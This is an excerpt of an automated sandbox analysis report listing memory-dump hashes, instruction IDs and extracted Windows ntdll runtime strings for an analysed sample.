                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                              • Instruction Fuzzy Hash: C7E0C2343003058FE755CF19C054B667BB6BFD5A10F28C069A9488F209EB32E882CB40
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c31c54c59d139499466a4e02d52d506c41fe2cc489e3899ae309c121b1addf6
                                                              • Instruction ID: 41809f3ada2dc6e0122c5ac5ba17b99411a6702a7a496a36771d78f4eeae0c58
                                                              • Opcode Fuzzy Hash: 2c31c54c59d139499466a4e02d52d506c41fe2cc489e3899ae309c121b1addf6
                                                              • Instruction Fuzzy Hash: B9D02B324810206ECB37E7997C04FA73A9ABB61320F0248A5F108DA0A1D5A4CCC192D4
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction ID: fc504c5e94356e932cdcec0e8144a28966dc0f2837dad9203137e6821795f144
                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                              • Instruction Fuzzy Hash: A3E08636100512DED7332F15DC04B5176A2FB94F10F20482EE0811A0B887709882DA44
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a561a134851ebfd3abf763b56074ab72077a78d4f33a57d623708fa55d478efc
                                                              • Instruction ID: e065f49e48b87b4f25a5c3c932a0e15472bcf196d07cf69faac92c4d7143f1a7
                                                              • Opcode Fuzzy Hash: a561a134851ebfd3abf763b56074ab72077a78d4f33a57d623708fa55d478efc
                                                              • Instruction Fuzzy Hash: 94E08C321005506BC612FE6EDD10E5A739AEFB4260F05012AF1558B6A4CA70AD40C7A4
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction ID: 932875af401995156b4bfdfcff7e80dd2c6b098cd8c91162aec32d981d222d61
                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                              • Instruction Fuzzy Hash: EEE08633511A1487C729DE58D511B7677E4FF45730F09463EA6134B7C1C574E544C794
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction ID: 193582ebc7f2eac908f9647358350ca243b5a8b5eb6a5c0bde14791cb9264f98
                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                              • Instruction Fuzzy Hash: F9D0A7331045105BD7329A1DFC04FC333D8BB58725F050459B005C7050C370EC41C644
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction ID: 963d06fdb15f87efe730a570349c7afb9d133d15f3975a779179bf0445fd3b6b
                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                              • Instruction Fuzzy Hash: 07E0EC369506849BDF16DF5AC645F5EBBF5FB94B40F150458A1486F661C738ED00CB40
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction ID: 43dcaa9ff0c9c54277acbb0cb6599524ec17dd80922bc867e83f82bbab860b94
                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                              • Instruction Fuzzy Hash: 3BD0223321203093CB295A566C04F636905ABC0EE0F2A006E340B93920C4248C43C2E0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction ID: 048764984c608ac5d89e9262d0580910de489a759e9e02807b8cc859bc80e8a8
                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                              • Instruction Fuzzy Hash: 34D012371D054DBBCB129F66DC01F957BA9E764BA0F444021B505875A0C63AE960D584
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c37b6e6cf7f26a788381156566ad3974d352d35497e0e336ef3f6e924ee98a9
                                                              • Instruction ID: 13965ac6718f858214e5ac954b5e8f2240a11eda37831a96912e7649875d9a92
                                                              • Opcode Fuzzy Hash: 6c37b6e6cf7f26a788381156566ad3974d352d35497e0e336ef3f6e924ee98a9
                                                              • Instruction Fuzzy Hash: 8AD0A730901401CFDF27CF89C514D3E36B0FF10644B4000ACFB015A520D334EC41C620
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction ID: ef096eb4192f4c6452da7d7786720b3a65656a9dd327e144f9fa525fe2936e17
                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                              • Instruction Fuzzy Hash: B0D09235312A80CFD61A8B0CC5A8B1633E4BB84A45F854891E441CBB22D67CD940CA00
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction ID: df485641772f3da298ab75f43090e50fb8a9d7b295817c1ff22c82e257d07a37
                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                              • Instruction Fuzzy Hash: 1EC01233290648AFC712AE9ACD01F027BA9EBA8B40F000062F2058B670C631E820EA84
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction ID: dca5a2d6ae681735812cf7244de0f8f4732506ef314cf7aeb821abb3ee6fc3a1
                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                              • Instruction Fuzzy Hash: 47D01236100248EFCB01DF41C890D9A772BFBD8710F10801DFD19077118A31ED62DA50
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction ID: 33b1d6b29412af72733465422159031e91a2cfc3301978b7da868ed7179ba16b
                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                              • Instruction Fuzzy Hash: F9C0487A701A468FEF16DF6AD298F4977E4FB54741F1508D0E805DBB22E624E802CA10
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6377a3a86af0bc0e7512a2e1dfb85958fdb40b497e2690737ec41536a2ddc69
                                                              • Instruction ID: 0e74f45ba3330aa6a04f2cbb6d37eb632975e13cdf02d8462bf0250d48745c72
                                                              • Opcode Fuzzy Hash: b6377a3a86af0bc0e7512a2e1dfb85958fdb40b497e2690737ec41536a2ddc69
                                                              • Instruction Fuzzy Hash: C7900233605810129140719848855464085B7E1311B59C411E0424958CCF548A565361
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d55cdb76a4222f3211e0f1a015b60de3c730793d6a411a5a13051725e2fa50d4
                                                              • Instruction ID: bed4222f2f87978376faae576112baf0c6facba3460c6770fe8ab651af726998
                                                              • Opcode Fuzzy Hash: d55cdb76a4222f3211e0f1a015b60de3c730793d6a411a5a13051725e2fa50d4
                                                              • Instruction Fuzzy Hash: CB900263601510424140719848054066085B7E2311399C515E0554964CCB5889559369
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81801164d23cf59d08c149bb1a71f4aca223489b2d673249f94951d154387731
                                                              • Instruction ID: 1934f930a232dc92ef440a15fc8b14c7979f31e503ad26da16c5b64f6b56527d
                                                              • Opcode Fuzzy Hash: 81801164d23cf59d08c149bb1a71f4aca223489b2d673249f94951d154387731
                                                              • Instruction Fuzzy Hash: 8090023320141802D1807198440564A0085A7D2311F99C415E0025A58DCF558B5977A1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5f19b1cf4da5d3d01df7d359a743efa1a5ae3edaadd56e9938991c4863372a4
                                                              • Instruction ID: 7a9c3833aa2b3cdff5f040154b5f5f43088a549721be31e35bf3325c6a688e3d
                                                              • Opcode Fuzzy Hash: c5f19b1cf4da5d3d01df7d359a743efa1a5ae3edaadd56e9938991c4863372a4
                                                              • Instruction Fuzzy Hash: A190022324141802D140719884157070086E7D1611F59C411E0024958DCB568A6567B1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d291318ad4637d885bdb4cb1b064c4ac7039286c7f158ef43348aeed2c31a52
                                                              • Instruction ID: ff11fc8910e93830b548b7839b64a1a001bdc0d7afd85ae6e62de43ae0db6dac
                                                              • Opcode Fuzzy Hash: 8d291318ad4637d885bdb4cb1b064c4ac7039286c7f158ef43348aeed2c31a52
                                                              • Instruction Fuzzy Hash: EF90022324546102D150719C44056164085B7E1211F59C421E0814998DCA9589556321
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63030dcab276916c7cd34f1704404334cfb1353637e7fbff9156d551223b6c28
                                                              • Instruction ID: 21886ffe48eefaf81f964c90c13c4986b25415866b1cb9ab49ba7703fb6c0142
                                                              • Opcode Fuzzy Hash: 63030dcab276916c7cd34f1704404334cfb1353637e7fbff9156d551223b6c28
                                                              • Instruction Fuzzy Hash: 2090023720141402D5107198580564600C6A7D1311F59D811E042495CDCB9489A1A221
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e745b328f06c6344c9a2f6ff46925ee57cc3bd750bdb1d6ba3d025a2b5c31e1
                                                              • Instruction ID: c69ac099f3c80980c13c7c95324269f60bb1ff27f97d626d914a864cf044b2cd
                                                              • Opcode Fuzzy Hash: 8e745b328f06c6344c9a2f6ff46925ee57cc3bd750bdb1d6ba3d025a2b5c31e1
                                                              • Instruction Fuzzy Hash: 1B90023320241142954072985805A4E4185A7E2312B99D815E0015958CCE5489615321
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: 3aa530bd9f9da46c43373b1a0acd4f4e5db6b312c331b1a8573885668b0fdd4a
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: c91673bea96281769799926cbf028d6a6402208403c978aed691629fc0c77e2a
                                                              • Instruction ID: 4d71cf93870a32284e4e170306e336cb7e6c1f891b409e8fc2fc425ce4abf445
                                                              • Opcode Fuzzy Hash: c91673bea96281769799926cbf028d6a6402208403c978aed691629fc0c77e2a
                                                              • Instruction Fuzzy Hash: B551D7B6A00216BFEB12DF9C899097EFBF8BB48240B64C129F555DB645D334DE408BE0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: aa97458d6092c39f1a225a12572c782ca8f0ce6d407fbc779da3c01aba610752
                                                              • Instruction ID: 7f09cc2e5ac3dfe9c1942077c0a6c8929c37776639c540b51da3c9774ba94be5
                                                              • Opcode Fuzzy Hash: aa97458d6092c39f1a225a12572c782ca8f0ce6d407fbc779da3c01aba610752
                                                              • Instruction Fuzzy Hash: 5451F4B5A40646AEDB20EE5DC89097FBFF8BF44200F44885AE4D6EF681E674DA00C770
                                                              Strings
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01544742
                                                              • Execute=1, xrefs: 01544713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01544725
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01544787
                                                              • ExecuteOptions, xrefs: 015446A0
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01544655
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015446FC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                              • Instruction ID: 74c2498aa8ab1d8cd795a21788d5c85d019b3ebdd593dda598d1dae989d098e7
                                                              • Opcode Fuzzy Hash: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                              • Instruction Fuzzy Hash: 89514B3160020ABBEF12EAE8DC95FAD77A8BF58744F14009AD606AF1D1D770AA458F50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: f5e176e961f0b6da425b7870111e6e4e95e77a4c474b9f3dadefdedc69d8df11
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 5081D170E0524A9EFF278E6CC8907FEBBB1BF55720F184A19D851AF299C7348840CB61
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                              • Instruction ID: e8786bc6c5ef11444cbc83e810c3bab9418f133a1d60c9a0c69fe5c39b74707d
                                                              • Opcode Fuzzy Hash: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                              • Instruction Fuzzy Hash: 5921657AA0011AABDB11EF79CC40AEE7FF8FF54644F54012AE905E7244E730D911CBA1
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015402E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015402BD
                                                              • RTL: Re-Waiting, xrefs: 0154031E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                              • Instruction ID: 72ba8d594e570dbccb1e3aae0c4933d82d8ca7fd677fa2a5113966577b62e800
                                                              • Opcode Fuzzy Hash: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                              • Instruction Fuzzy Hash: 7BE1B2316087429FE725CF28C884B5ABBE0BF84714F240A5EF6A58B3E1D774D849CB42
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 01547B8E
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01547B7F
                                                              • RTL: Re-Waiting, xrefs: 01547BAC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                              • Instruction ID: 807058155cd81d3a44174f106b8b8a3c69af269eac6b63c19e3b0557252c29b0
                                                              • Opcode Fuzzy Hash: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                              • Instruction Fuzzy Hash: 6141D1353007039FD726DE69C880B6AB7E5FB98710F100A1EF9669F280EB71E8058B91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0154728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 015472A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01547294
                                                              • RTL: Re-Waiting, xrefs: 015472C1
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                              • Instruction ID: a63b01235db0345fa8c167f9d94fc83f02739ebc9e86db1ee72517f8d1716b09
                                                              • Opcode Fuzzy Hash: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                              • Instruction Fuzzy Hash: 0541D035704203ABD721DE69CC81F6AB7A6FB98714F100A1AF955AF280DB71F94287E1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                              • Instruction ID: 107506d1d61f036fb0fe57c0eb4cf3202bdf8afb1c4346a8631a2d7d116a8fd5
                                                              • Opcode Fuzzy Hash: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                              • Instruction Fuzzy Hash: C6315476A002199FDB20DE2DCC50BEEBBF8FF54650F94455AE949E7240EF309A44CBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: c4743d285e126930926dd09acfa3ca83470034b349d5f8689e92f456643c011d
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 22919471E0020A9EFB26DF6DC8806BFBBE5BF48320F54461AE965EF2C8D73499408751
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
